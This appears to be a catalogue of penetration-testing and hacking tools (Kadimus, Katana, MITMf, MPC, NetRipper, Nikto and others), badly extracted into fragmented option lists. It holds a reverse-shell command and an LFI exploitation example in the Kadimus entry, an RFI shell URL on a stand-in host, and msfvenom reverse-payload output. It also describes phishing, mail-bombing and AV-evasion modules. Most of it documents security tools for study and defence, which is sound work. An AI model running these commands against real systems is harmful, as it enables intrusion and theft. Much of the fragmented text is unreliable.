0.2 Time based algorithm, Multi-thread control (start
pause resume stop), Shows URL calls.
Ideally, you should be able to run the setup script, and it will
install everything you need.
For the Shodan information gathering module, YOU WILL
NEED a Shodan API key. This costs like $9 bucks, come on
now, it's worth it :).
Usage
DownloadJust-Metadata
KADIMUS - LFI SCAN & EXPLOIT TOOL
Compile:
Installing libcurl:
CentOS/Fedora
# yum install libcurl-devel
Debian based
Installing libpcre:
CentOS/Fedora
Debian based
Installing libssh:
CentOS/Fedora
# yum install libssh-devel
Debian based
And finally:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make
Options:
-h, --help
Request:
-B, --cookie STRING
header
-A, --user-agent STRING
User-Agent to send to
server
--connect-timeout SECONDS
connection
--retry-times NUMBER
if connection fails
--proxy STRING
protocol://hostname:port
Scanner:
-u, --url STRING
scan
results
--threads NUMBER
Number of threads
(2..1000)
Explotation:
-t, --target STRING
Vulnerable Target to
exploit
--injec-at STRING
exploit
(only need with RCE data
and source disclosure)
RCE:
-X, --rce-technique=TECH
use
execute, with php brackets
-c, --cmd STRING
connection.
-l, --listen NUMBER
port to listen
-b, --bind-shell
shell
-i, --connect-to STRING
Ip/Hostname to connect
--ssh-port NUMBER
proc/self/environ
input
php://input
auth
var/log/auth.log
data
data://text
Source Disclosure:
-G, --get-source
using filter://
-f, --filename STRING
source [REQUIRED]
-O FILE
stdout)
Examples:
Scanning:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout
10 --retry-times 0
Execute command:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c
'ls -lah' --ssh-target localhost
You can also check for RFI errors, just put the remote url on
resource/common_files.txt and the regex to identify this,
example:
/* http://bad-url.com/shell.txt */ <?php echo
base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU=
"); ?>
in file:
http://bad-url.com/shell.txt?:scorpion say get over here
Reverse shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at
pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345
0>&1' --retry-times 0
Download Kadimus
KALI LINUX 1.1.0 - THE BEST PENETRATION TESTING
DISTRIBUTION
DISTRIBUTION
So, whats new in Kali 2.0? Theres a new 4.0 kernel, now
based on Debian Jessie, improved hardware and wireless
drivercoverage, support for a variety of Desktop Environments
(gnome, kde, xfce, mate, e17, lxde, i3wm), updated desktop
environment and tools and the list goes on.
Kali Linux is Now a Rolling Distribution
One of the biggest moves weve taken to keep Kali 2.0 up-todatein a global, continuous manner, is transforming Kali into
a rolling distribution. What this means is that we are pulling
our packages continuously fromDebian Testing
(aftermakingsure that all packages areinstallable)
essentially upgrading the Kali core system, while allowing us to
Through our Live Build process, Kali 2.0 now natively supports
KDE, GNOME3, Xfce, MATE, e17, lxde and i3wm. Weve
moved on to GNOME 3 in this release, marking the end of a
long abstinence period. Weve finally embraced GNOME 3 and
with a few custom changes, its grown to be our favourite
desktop environment. Weve added custom support for multilevel menus, true terminal transparency, as well as a handful of
useful gnome shell extensions. This however has come at a
price the minimum RAM requirements for a full GNOME 3
session has increased to 768 MB. This is a non-issue on
modern hardware but can be detrimental on lower-end
machines. For this reason, we have also released an official,
minimal Kali 2.0 ISO. This light flavour of Kali includes a
handful of useful tools together with the lightweight Xfce
desktop environment a perfect solution for resource-
constrained computers.
Kali Linux 2.0 ARM Images &NetHunter 2.0
The whole ARM image section has been updated across the
board with Kali 2.0 including Raspberry Pi, Chromebooks,
Odroids The whole lot! In the process, weve added some
new images such as the latest Chromebook Flip the little
beauty here on the right. Go ahead, click on the image, take a
closer look. Another helpful change weve implemented in our
ARM images is including kernel sources, for easier compilation
of new drivers.
We havent forgotten about NetHunter, our favourite mobile
penetration testing platform which also got an update and
nowincludes Kali 2.0. With this, wevereleased a whole
barrage of new NetHunter images for Nexus 5, 6, 7, 9, and 10.
The OnePlus One NetHunter image has also been updated to
Kali 2.0 and now has a much awaited image for CM12 as well
check the Offensive Security NetHunter page for more
information.
UpdatedVMwareandVirtualBox Images
Yes, you can upgrade Kali 1.x toKali 2.0!To do this, you will
need to edit your source.list entries, and run a dist-upgrade as
shown below.If you have been using incorrect or extraneous
Kali repositories or otherwise manually installed or overwritten
Kali packages outside of apt, your upgrade to Kali 2.0 may
fail.This includes scripts like lazykali.sh, PTF, manual git
clones in incorrect directories, etc. All of these will clobber
existing files on the filesystem and result in a failed upgrade. If
this is the case for you, youre better off reinstalling your OS
from scratch.
Otherwise, feel free to:
cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates
main contrib non-free
EOF
apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot
MAIN FILES
--core
Setting.py
design.py
Errors.py
ping.py
--- Funcitons
--scripts
__init__.py
REQUIREMENTS
OS requirement:
Kali Linux
INSTALLATION
Installation of Katana framework:
git clone https://github.com/RedToor/katana.git
cd Katana
chmod 777 install.py
python install.py
USAGE COMMANDS
Stable
---------------------------------------------------------
--------./sudo ktf.console
98%
Builded - Enabled
./sudo ktf.run -m net/arpspoof
95%
Builded - Enabled
Building
--------------------------------------------------------------ktf.lab
30%
Builded - No yet.
ktf.linker -m web/whois -t google.com -p 80
80%
Builded - No yet.
MODULES (SCRIPTS)
Code Name
Description
Autor
Versi
on
web/httpbt
Redtoor
1.0
web/formbt
Redtoor
1.0
web/
cpfinder
Redtoor
1.0
web/
joomscan
Redtoor
1.0
web/dos
Redtoor
1.0
web/whois
Who-is web
Redtoor
1.0
net/
arpspoof
ARP-Spoofing attack
Redtoor
1.0
net/arplook
ARP-Spoofing
detector
cl34r
1.0
net/
portscan
Port Scanner
RedToor
1.0
set/
gdreport
Getting information
with web
RedToor
3.0
set/
mailboom
E-mail boombing
SPAM
RedToor
3.0
set/
facebrok
facebook phishing
plataform
RedToor
1.7
fle/brutezip
LeSZO
ZerO
1.0
fle/bruterar
LeSZO
ZerO
1.0
clt/ftp
Redtoor
1.0
clt/sql
Redtoor
1.0
clt/pop3
Redtoor
1.0
clt/ftp
Redtoor
1.0
ser/sql
Redtoor
1.0
ser/apache
Redtoor
1.0
ser/ssh
Redtoor
1.0
fbt/ftp
Redtoor
1.0
fbt/ssh
Redtoor
1.0
fbt/sql
Redtoor
1.0
fbt/pop3
Redtoor
1.0
LINKS
Project in SF : http://sourceforge.net/projects/katanas/
files/
Documentation: https://github.com/RedToor/Katana/tree/
master/doc
Blog of project[ES]: http://cave-rt.blogspot.com.co/
2015/07/instalacion-y-uso-katana-framework.html
Download Katana
KATOOLIN - AUTOMATICALLY INSTALL ALL KALI LINUX
TOOLS
Requirements
Python 2.7
An operating system (tested on Ubuntu)
Instalation
sudo su
git clone https://github.com/LionSec/katoolin.git && cp
katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
Video
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Usage
DownloadKatoolin
KEEFARCE - EXTRACTS PASSWORDS FROM A KEEPASS
2.X DATABASE, DIRECTLY FROM MEMORY
Download KeeFarce
KEYBOX - A WEB-BASED SSH CONSOLE THAT
CENTRALLY MANAGES ADMINISTRATIVE ACCESS TO
SYSTEMS
for Windows
set JAVA_HOME=C:\path\to\jdk
set PATH=%JAVA_HOME%\bin;%PATH%
Start KeyBox
for Linux/Unix/OSX
./startKeyBox.sh
for Windows
startKeyBox.bat
Steps:
1. Create systems
2. Create profiles
3. Assign systems to profile
4. Assign profiles to users
5. Users can login to create sessions on assigned systems
6. Start a composite SSH session or create and execute a
script across multiple sessions
7. Add additional public keys to systems
8. Disable any adminstrative public key forcing key rotation.
9. Audit session history
DownloadKeyBox
KING PHISHER - PHISHING CAMPAIGN TOOLKIT
DownloadKing Phisher
KUNAI - PWNING & INFO GATHERING VIA USER
BROWSER
Example configs
DownloadKunai
LIME - LINUX MEMORY EXTRACTOR
Usage
format=<raw|padded|lime> [dio=<0|1>]"
path (required):
Examples
In this example we use adb to load LiME and then start it with
acquisition performed over the network
$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"
Acquiring to sdcard
# insmod /sdcard/lime.ko "path=/sdcard/ram.lime
format=lime"
Download Lime
LINSET - WPA/WPA2 HACK WITHOUT BRUTE FORCE
How it works
DownloadLINSET
LMD - LINUX MALWARE DETECT
Linux Malware Detect (LMD) is a malware scanner for Linux
released under the GNU GPLv2 license, that is designed
around the threats faced in shared hosted environments. It
uses threat data from network edge intrusion detection systems
to extract malware that is actively being used in attacks and
generates signatures for detection. In addition, threat data is
also derived from user submissions with the LMD checkout
feature and from malware community resources. The
signatures that LMD uses are MD5 file hashes and HEX pattern
matches, they are also easily exported to any number of
detection tools such as ClamAV.
The driving force behind LMD is that there is currently limited
availability of open source/restriction free tools for Linux
systems that focus on malware detection and more important
Using the Team Cymru malware hash registry, we can see that
of the 8,883 malware hashes shipping with LMD 1.5, there was
6,931 or 78% of threats that went undetected by 30 commercial
anti-virus and malware products. The 1,951 threats that were
detected had an average detection rate of 58% with a low and
high detection rate of 10% and 100% respectively. There could
not be a clearer statement to the need for an open and
community driven malware remediation project that focuses on
the threat landscape of multi-user shared environments.
Features:
or FILE
kernel inotify monitor convenience feature to monitor
system users
kernel inotify monitor can be restricted to a configurable
user html root
kernel inotify monitor with dynamic sysctl limits for optimal
performance
kernel inotify alerting through daily and/or optional weekly
reports
e-mail alert reporting after every scan execution (manual
& daily)
path, extension and signature based ignore options
background scanner option for unattended scan
operations
verbose logging & output of all actions
Source Data:
The LMD signature are updated typically once per day or more
frequently depending on incoming threat data from the LMD
checkout feature, IPS malware extraction and other sources.
The updating of signatures in LMD installations is performed
daily through the default cron.daily script with the update
option, which can be run manually at any time.
An RSS feed is available for tracking malware threat updates:
http://www.rfxn.com/api/lmd
Detected Threats:
perl.ircbot.xscan
bin.dccserv.irsexxy
perl.mailer.yellsoft
bin.fakeproc.Xnuxer
perl.shell.cbLorD
bin.ircbot.nbot
perl.shell.cgitelnet
bin.ircbot.php3
php.cmdshell.c100
bin.ircbot.unclassed
php.cmdshell.c99
bin.pktflood.ABC123
php.cmdshell.cih
bin.pktflood.osf
php.cmdshell.egyspider
bin.trojan.linuxsmalli
php.cmdshell.fx29
c.ircbot.tsunami
php.cmdshell.ItsmYarD
exp.linux.rstb
php.cmdshell.Ketemu
exp.linux.unclassed
php.cmdshell.N3tshell
exp.setuid0.unclassed
php.cmdshell.r57
gzbase64.inject
php.cmdshell.unclassed
html.phishing.auc61
php.defash.buno
html.phishing.hsbc
php.exe.globals
perl.connback.DataCha0s
php.include.remote
perl.connback.N2
php.ircbot.InsideTeam
perl.cpanel.cpwrap
php.ircbot.lolwut
perl.ircbot.atrixteam
php.ircbot.sniper
perl.ircbot.bRuNo
php.ircbot.vj_denie
perl.ircbot.Clx
php.mailer.10hack
perl.ircbot.devil
php.mailer.bombam
perl.ircbot.fx29
php.mailer.PostMan
perl.ircbot.magnum
php.phishing.AliKay
perl.ircbot.oldwolf
php.phishing.mrbrain
perl.ircbot.putr4XtReme
php.phishing.ReZulT
perl.ircbot.rafflesia
php.pktflood.oey
perl.ircbot.UberCracker
php.shell.rc99
perl.ircbot.xdh
php.shell.shellcomm
Real-Time Monitoring:
Download LMD
LOKI - SCANNER FOR SIMPLE INDICATORS OF
COMPROMISE
Reports
-p path
Path to scan
-s kilobyte
--noprocscan
--nofilescan
--noindicator
--debug
Debug output
Download Loki
LUKS-OPS - AUTOMATE THE USAGE OF LUKS VOLUMES
IN LINUX
Default Options:
DownloadLUKS-OPs
LYNIS 2.0.0 - SECURITY AUDITING TOOL FOR UNIX/LINUX
SYSTEMS
Privileged or non-privileged
DownloadLynis 2.0.0
LYNIS 2.1.0 - SECURITY AUDITING TOOL FOR UNIX/LINUX
SYSTEMS
The tool is very flexible and easy to use. It is one of the few
tools, in which installation is optional. Just place it on the
system, give it a command like "audit system", and it will run. It
is written in shell script and released as open source software
(GPL).
How it works
Lynis performs hundreds of individual tests, to determine the
security state of the system. The security scan itself consists of
performing a set of steps, from initialization the program, up to
the report.
Steps
1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
During the scan, technical details about the scan are stored in a
log file. At the same time findings (warnings, suggestions, data
collection), are stored in a report file.
Opportunistic scanning
Many other tools use the same data files for performing tests.
OpenVAS / Nessus
These products focus primarily on vulnerability scanning. They
do this via the network by polling services. Optionally they will
log in to a system and gather data.
Differences with OpenVAS / Nessus
Lynis runs on the host itself, therefore it can perform a deeper
analysis compared with network based scans. Additionally,
there is no risk for your business processes, and log files
remain clean from connection attempts and incorrect requests.
Although Lynis is an auditing tool, it will actually discover
vulnerabilities as well. It does so by using existing tools and
analyzing configuration files.
Lynis and OpenVAS are both open source and free to use.
Nessus is a closed source and paid.
Benefits of Lynis
Much faster
No pollution of log files, no disruption to business services
Host based scans provides more in-depth audit
Changelog
Lynis 2.1.0
= Lynis 2.1.0 (2015-04-16) =
General:
AIX
FreeBSD
HP-UX
Linux
Mac OS
NetBSD
OpenBSD
Solaris
and others
It even runs on systems like the Raspberry Pi and several
storage devices!
No installation required
The tool is very flexible and easy to use. It is one of the few
tools, in which installation is optional. Just place it on the
system, give it a command like "audit system", and it will run. It
is written in shell script and released as open source software
(GPL).
How it works
Lynis performs hundreds of individual tests, to determine the
security state of the system. The security scan itself consists of
performing a set of steps, from initialization the program, up to
the report.
Steps
Many other tools use the same data files for performing tests.
Since Lynis is not limited to a few common Linux distributions, it
uses tests from standards and many custom ones not found in
any other tool.
Best practices
CIS
NIST
NSA
OpenSCAP data
Vendor guides and recommendations (e.g. Debian
Gentoo, Red Hat)
Parameters
--auditor "Given name Surname"
-c
--check-update
--cronjob
--help
-h
--manpage
--nocolors
--pentest
privileged)
--quick
-Q
--quiet
doesn't wait)
--reverse-colors
lighter backgrounds
--version
-V
Changelog
Lynis 2.1.1
=
-------------------------------------------------------------
libarchive-dev
Mac OS X
For compiling Malheur on Mac OS X a working installation of
Xcode is required including gcc. Additionally, the following
packages need to be installed via Homebrew
libconfig
libarchive (from homebrew-alt)
OpenBSD
For compiling Malheur on OpenBSD the following packages are
required. Note that you need to use gmake instead of make for
building Malheur.
gmake
libconfig
libarchive
$ make
$ make check
$ make install
installation
DownloadMALHEUR
MALIGNO V2.0 - METASPLOIT PAYLOAD SERVER
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
DownloadMaligno v2.0
MALWARE - MALWARE REPOSITORY FRAMEWORK
DownloadMalwaRE
MASSBLEED - MASS SSL VULNERABILITY SCANNER
USAGE
ABOUT
This script has four main functions with the ability to proxy all
connections:
1. To mass scan any CIDR range for OpenSSL
vulnerabilities via port 443/tcp (https) (example: sh
massbleed.sh 192.168.0.0/16)
2. To scan any CIDR range for OpenSSL vulnerabilities via
any custom port specified (example: sh massbleed.sh
192.168.0.0/16 port 8443)
3. To individual scan every port (1-10000) on a single system
for vulnerable versions of OpenSSL (example: sh
massbleed.sh 127.0.0.1 single)
4. To scan every open port on every host in a single class C
subnet for OpenSSL vulnerabilities (example: sh
massbleed.sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via
proxychains. You'll need to configure /etc/proxychains.conf for
this to work.
PROXY USAGE EXAMPLES: (example: sh massbleed.sh
192.168.0.0/16 0 0 proxy) (example: sh massbleed.sh
192.168.0.0/16 port 8443 proxy) (example: sh massbleed.sh
127.0.0.1 single 0 proxy) (example: sh massbleed.sh
192.168.0. subnet 0 proxy)
VULNERABILITIES:
1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
3. Poodle SSLv3 vulnerability (CVE-2014-3566)
DownloadMassBleed
this application:
Thread-based parallel testing. Brute-force testing can be
performed against multiple hosts, users or passwords
concurrently.
Flexible user input. Target information (host/user/
password) can be specified in a variety of ways. For
example, each item can be either a single entry or a file
containing multiple entries. Additionally, a combination file
format allows the user to refine their target listing.
Modular design. Each service module exists as an
independent .mod file. This means that no modifications
are necessary to the core application in order to extend
the supported list of services for brute-forcing.
Why?
AFP
CVS
FTP
HTTP
IMAP
MS-SQL
MySQL
NetWare NCP
NNTP
PcAnywhere
POP3
PostgreSQL
REXEC
RDP
RLOGIN
RSH
SMBNT
SMTP-AUTH
SMTP-VRFY
SNMP
SSHv2
Subversion (SVN)
Telnet
VMware Authentication Daemon (vmauthd)
VNC
Generic Wrapper
Web Form
News
DownloadMedusa
METASPLOIT AV EVASION - METASPLOIT PAYLOAD
GENERATOR THAT AVOIDS MOST ANTI-VIRUS
PRODUCTS
DownloadMetasploit AV Evasion
MICENUM - MANDATORY INTEGRITY CONTROL
ENUMERATOR FOR WINDOWS
Download MicEnum
MITMF - FRAMEWORK FOR MAN-IN-THE-MIDDLE
ATTACKS
connected clients
Screenshotter - Uses HTML5 Canvas to render an
accurate screenshot of a clients browser
Responder - LLMNR, NBT-NS, WPAD and MDNS
poisoner
SSLstrip+ - Partially bypass HSTS
Spoof - Redirect traffic using ARP spoofing, ICMP
redirects or DHCP spoofing
BeEFAutorun - Autoruns BeEF modules based on a
client's OS or browser type
AppCachePoison - Perform app cache poisoning attacks
Ferret-NG - Transperently hijacks sessions
BrowserProfiler - Attempts to enumerate all browser
plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables sent over HTTP using
the Backdoor Factory and BDFProxy
Inject - Inject arbitrary content into HTML content
BrowserSniper - Performs drive-by attacks on clients with
out-of-date browser plugins
webpages
Replace - Replace arbitary content in HTML content
SMBAuth - Evoke SMB challenge-response authentication
attempts
Upsidedownternet - Flips images 180 degrees
Installation
If MITMf is not in your distro's repo or you just want the latest
version:
Run the command git clone https://github.com/
byt3bl33d3r/MITMf.git to clone this directory
Run the setup.sh script
Run the command pip install --upgrade -r
requirements.txt to install all Python dependencies
On Kali Linux, if you get an error while installing the pypcap
package or when starting MITMf you see: ImportError: no
module named pcap, run apt-get install python-pypcap to
fix it
DownloadMITMf
MOBAXTERM - TERMINAL FOR WINDOWS WITH X11
SERVER, TABBED SSH CLIENT, NETWORK TOOLS AND
MUCH MORE...
application for your remote tasks, e.g. when you use SSH to
connect to a remote server, a graphical SFTP browser will
automatically pop up in order to directly edit your remote files.
Your remote applications will also display seamlessly on your
Windows desktop using the embedded X server.
You can download and use MobaXterm Home Edition for free.
If you want to use it inside your company, you should consider
subscribing to MobaXterm Professional Edition: this will give
you access to much more features, professional support and
"Customizer" software.
When developing MobaXterm, we focused on a simple aim:
proposing an intuitive user interface in order for you to
efficiently access remote servers through different networks
or systems.
Key features
system.
Tcl / Tk / Expect: Tcl is a simple-to-learn yet very powerful
language. Tk is its graphical toolkit. Expect is an automation
tool for terminal.
X11Fonts: Complete set of fonts for X11 server.
X3270Suite: IBM 3270 terminal emulator for Windows.
XServers: Xephyr, Xnest, Xdmx, Xvfb and Xfake alternate X11
servers.
Xmllint: A command line XML tool.
Xorg (legacy): The old X11 (Xorg v1.6.5) server: use this
plugin if you have trouble connecting to an old Unix station
through XDMCP.
Zip: Zip compression utility.
DownloadMobaXterm
MOBSF (MOBILE SECURITY FRAMEWORK) - MOBILE
(ANDROID/IOS) AUTOMATED PEN-TESTING FRAMEWORK
https://github.com/ajinabraham/Mobile-SecurityFramework-MobSF/wiki/Documentation
Queries
v0.8.7 Changelog
Improved Static Analysis Rules
Better AndroidManifest View
Search in Files
v0.8.6 Changelog
Detects implicitly exported component from manifest.
Added CFR decompiler support
Fixed Regex DoS on URL Regex
v0.8.5 Changelog
Bug Fix to support IPA MIME Type: application/x-itunesipa
v0.8.4 Changelog
Improved Android Static Code Analysis speed (2X
performance)
Static Code analysis on Dexguard protected APK.
Fixed a Security Issue - Email Regex DoS.
Added Logging Code.
All Browser Support.
MIME Type Bug fix to Support IE.
Fixed Progress Bar.
v0.8.3 Changelog
View AndroidManifest.xml & Info.plist
Credits
Download Mobile-Security-Framework-Mobsf
MOSCA - STATIC ANALYSIS TOOL TO FIND BUGS
Just another Simple static analysis tool to find bugs like a grep
unix command, at mosca have a modules, that was call egg,
each egg is a simple config to find bug at especific language
like PHP,Ruby,ASP etc... Example of egg config at directory
"egg", If Mosca read a line with vunerability of egg in source
code, then, mosca have alert about vulnerability and save at
logs.
Download Mosca
MPC - MSFVENOM PAYLOAD CREATOR
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/
mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc
Help
root@kali:~# mpc -h -v
[*] Msfvenom Payload Creator (MPC v1.3)
[i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/
MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/
HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
[i]
+ ASP
[i]
+ ASPX
[i]
+ Bash [.sh]
[i]
+ Java [.jsp]
[i]
+ Linux [.elf]
[i]
+ OSX [.macho]
[i]
+ Perl [.pl]
[i]
+ PHP
[i]
+ Powershell [.ps1]
[i]
+ Python [.py]
[i]
+ Tomcat [.war]
[i]
+ Windows [.exe]
https://www.offensive-
security.com/metasploit-unleashed/payload-types/
[i]
https://www.offensive-
security.com/metasploit-unleashed/payloads/
[i] <TCP> is the standard method to connecting back.
This is the most compatible with TYPES as its RAW. Can be
easily detected on IDSs.
[i] <HTTP> makes the communication appear to be HTTP
traffic (unencrypted). Helpful for packet inspection,
which limit port access on protocol - e.g. TCP 80.
[i] <HTTPS> makes the communication appear to be
(encrypted) HTTP traffic using as SSL. Helpful for packet
inspection, which limit port access on protocol - e.g.
TCP 443.
[i] <FIND_PORT> will attempt every port on the target
IP: 192.168.1.10
(msfconsole -q -r /root/
windows-meterpreter-staged-reverse-tcp-443-exe.rc)
[?] Quick web server for file transfer?
python -m
SimpleHTTPServer 8080
[*] Done!
root@kali:~#
IP: 192.168.103.238
(msfconsole -q -r /root/linux-shell-
staged-reverse-tcp-4444-elf.rc)
[?] Quick web server for file transfer?
SimpleHTTPServer 8080
[*] Done!
root@kali:~#
python -m
[i]
[i]
[i]
4.) lo - 127.0.0.1
[i]
IP: 10.10.100.63
[i]
PORT: 443
[i]
[i]
SHELL: shell
STAGE: stageless
METHOD: tcp
[i]
MD5: 53452eafafe21bff94e6c4621525165b
(msfconsole -q -r /root/python-
shell-stageless-reverse-tcp-443-py.rc)
[?] Quick web server for file transfer?
python -m
SimpleHTTPServer 8080
[*] Done!
root@kali:~#
To-Do List
Shellcode generation
x64 payloads
IPv6 support
Look into using OS scripting more (powershell_bind_tcp
& bind_perl etc)
Login Password
Database Schema
MySQL Port
MySQL Host/Server Address
URLs visited
POST loads sent
HTTP form logins/passwords
HTTP basic auth logins/passwords
HTTP searches
FTP logins/passwords
IRC logins/passwords
POP logins/passwords
IMAP logins/passwords
Telnet logins/passwords
SMTP logins/passwords
SNMP community string
NTLMv1/v2 all supported protocols like HTTP, SMB,
LDAP, etc
Kerberos
Examples
DownloadNet-creds
NETOOL.SH - MITM PENTESTING OPENSOURCE T00LKIT
netool.sh toolkit provides a fast and easy way For new arrivals
to IT security pentesting and also to experience users to use
allmost all features that the Man-In-The-Middle can provide
under local lan, since scanning, sniffing and social engeneering
attacks "[spear phishing attacks]"...
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
DESCRIPTION
Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' -exploit-get ?0x27 -s report.log --comand-vul 'nmap -Pn -p
1-8080 --script http-enum --open _TARGET_'
Operative Systems Supported
"TOOLKIT DEPENDENCIES"
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet |
Apache2 | sslstrip
"SCANNER INURLBR.php"
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl
* Install zenity | Install nmap | Install ettercap | Install
macchanger | Install metasploit | Install Apache2 *
Features (modules)
"1-Show Local Connections"
"2-Nmap Scanner menu"
->
Ping target
Show my Ip address
See/change mac address
change my PC hostname
Scan Local network
Scan external lan for hosts
Scan a list of targets (list.txt)
Scan remote host for vulns
Execute Nmap command
Screenshots
Downloadnetool.sh
NETRIPPER - SMART TRAFFIC SNIFFING FOR
PENETRATION TESTERS
files
netripper.rb
Command line
Injection: NetRipper.exe DLLpath.dll processname.exe
Example:
Generate DLL:
-h,
--help
-w,
--write
configuration data
-l,
--location
(default TEMP)
Plugins:
-p,
--plaintext
--datalimit
true
-d,
E.g. 4096
-s,
--stringfinder
user,pass,config
Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096
-s user,pass
Metasploit module
msf > use post/windows/gather/netripper
msf post(netripper) > show options
Module options (post/windows/gather/netripper):
Name
Required
Current Setting
Description
-----------
-------------------------
DATALIMIT
4096
no
TEMP
no
PLAINTEXT
true
no
no
no
yes
user,login,pass,database,config
no
1. cp netripper.rb /usr/share/metasploit-framework/modules/
post/windows/gather/netripper.rb
2. mkdir /usr/share/metasploit-framework/modules/post/
windows/gather/netripper
3. g++ -Wall netripper.cpp -o netripper
4. cp netripper /usr/share/metasploit-framework/modules/
post/windows/gather/netripper/netripper
5. cd ../Release
6. cp DLL.dll /usr/share/metasploit-framework/modules/post/
windows/gather/netripper/DLL.dll
PowerShell module
DownloadNetRipper
NETSPARKER 4 - EASIER TO USE, MORE AUTOMATION
AND MUCH MORE WEB SECURITY CHECKS
This is the first thing you will notice when you launch the new
version of Netsparker Desktop; a more straightforward and
easier to use New Scan dialog. Easy to use software has
become synonymous with Netsparkers scanners and in this
version we raised the bar again, giving the opportunity to many
users to launch web security scans even if they are not that
familiar with web application security.
Once you enter the necessary details, mainly the login form
URL and credentials you can clickVerify Login & Logoutto
verify that the scanner can automatically login and identify a
logged in session, as shown in the below screenshot.
You do not have to record any login macros because the new
mechanism is all based on DOM. You just have to enter the
The above list just highlights the most prominent features and
new security checks of Netsparker Desktop version 4, the only
false positive free web application security scanner. Included in
this version there are also more new security checks and we
also improved several existing security checks, hence the
scanners coverage is better than ever before. Of course we
also included a number of product improvements.
Since there have been a good number of improvements and
changes in this version there are also some things from older
versions of Netsparker which are no longer supported, such as
scan profiles. Because we changed the way Netsparker saves
the scan profiles, scan profiles generated with older versions of
Netsparker will no longer work. Therefore I recommend you to
check the Netsparker Desktop version 4 changelog for more
information on what is new, changed and improved.
EASY
You can add multiple users with different privileges to the same
Netsparker Cloud account, thus allowing everyone in the
organization to easily collaborate and share all the findings to
streamline the process of securing web applications.
CORRELATED TRENDING REPORTS HELP YOU KEEP
TRACK OF WEB APPLICATION PROJECTS
Web applications are constantly evolving; new features,
functionality and improvements are the order of the day to
ensure they continuously meet all business requirements.
Though such changes also open up new security issues.
Netsparker Cloud security dashboard allows you to easily keep
an eye on the state of security of all web applications while the
trending reports will help you keep track of the quality of work
your developers are doing. Trending reports can also help you
monitor who is improving so you can better assign tasks
according to each of the developers skills.
Basic usage
Options:
-ask+
submitting updates
yes
no
auto
(default)
send
-Cgidirs+
-Display+
Show redirects
Show cookies
Debug output
Print progress to
received
responses
require authentication
errors
STDOUT
and hostnames
V
-dbcheck
Verbose output
Encoding technique:
1
Directory self-
Fake parameter
TAB as request
Use Windows
Use a carriage
(non-UTF8)
reference (/./)
string
spacer
the URL
directory separator (\)
return (0x0d) as a request spacer
B
Comma-separated-
htm
HTML Format
msf+
Log to Metasploit
nbe
txt
Plain text
value
xml
XML Format
-host+
Target host
-IgnoreCode
responses
-id+
-list-plugins
perform no testing
-maxtime+
-mutate+
Attempt to brute
Attempt to guess
-nointeractive
-nolookup
-nossl
-no404
for auto-name)
-Pause+
integer or float)
-Plugins+
(default: ALL)
-port+
-RSAcert+
-root+
-Tuning+
Scan tuning:
1
Interesting File /
Misconfiguration /
Information
Injection (XSS/
Remote File
Denial of Service
Remote File
Seen in logs
Default File
Disclosure
Script/HTML)
Retrieval - Inside Web Root
Command Execution /
SQL Injection
File Upload
Authentication
Software
Remote Source
Reverse Tuning
Remote Shell
Bypass
Identification
Inclusion
Options (i.e., include all except specified)
-timeout+
10 seconds)
-Userdbs
duration
-update
from CIRT.net
-useproxy
nikto.conf
-Version
versions
-vhost+
+ requires a value
Basic Testing
To check on a different port, specify the port number with the p (-port) option. This will scan the IP 192.168.0.1 on TCP port
443:
perl nikto.pl -h 192.168.0.1 -p 443
test more than one port on the same host, specify the list of
ports in the -p (-port) option. Ports can be specified as a
range (i.e., 80-90), or as a comma-delimited list, (i.e.,
80,88,90). This will scan the host on ports 80, 88 and 443.
perl nikto.pl -h 192.168.0.1 -p 80,88,443
DownloadNikto2
NIPE - SCRIPT TO REDIRECT ALL TRAFFIC FROM THE
MACHINE TO THE TOR NETWORK
Script to redirect all the traffic from the machine to the Tor
network.
[+] AUTOR:
Vinicius Gouvea
[+] EMAIL:
vini@inploit.com
[+] BLOG:
https://medium.com/viniciusgouvea
[+] GITHUB:
https://github.com/HeitorG
[+] FACEBOOK:
https://fb.com/viniciushgouvea
Installing:
Commands:
COMMAND
FUNCTION
install
For install.
start
To start
stop
To stop
Tested on:
Ubuntu 14.10 and 15.04
Busen Labs Hydrogen
Debian Jessie 8.1 and Wheezy 7.9
Lubuntu 15.04
Xubuntu 15.04
LionSec 3.0
Download Nipe
NIPPER - TOOLKIT WEB SCAN FOR ANDROID
IP Server
CMS Detect & Version
DNS Lookup
Nmap ports IP SERVER
Enumeration Users
Enumeration Plugins
Find Exploit Core CMS
Find Exploit DB
CloudFlare Resolver
Nipper NO requiere ROOT, tan solo requiere permiso a
internet.
Compatible desde 2.3 a Android L.
DownloadNipper
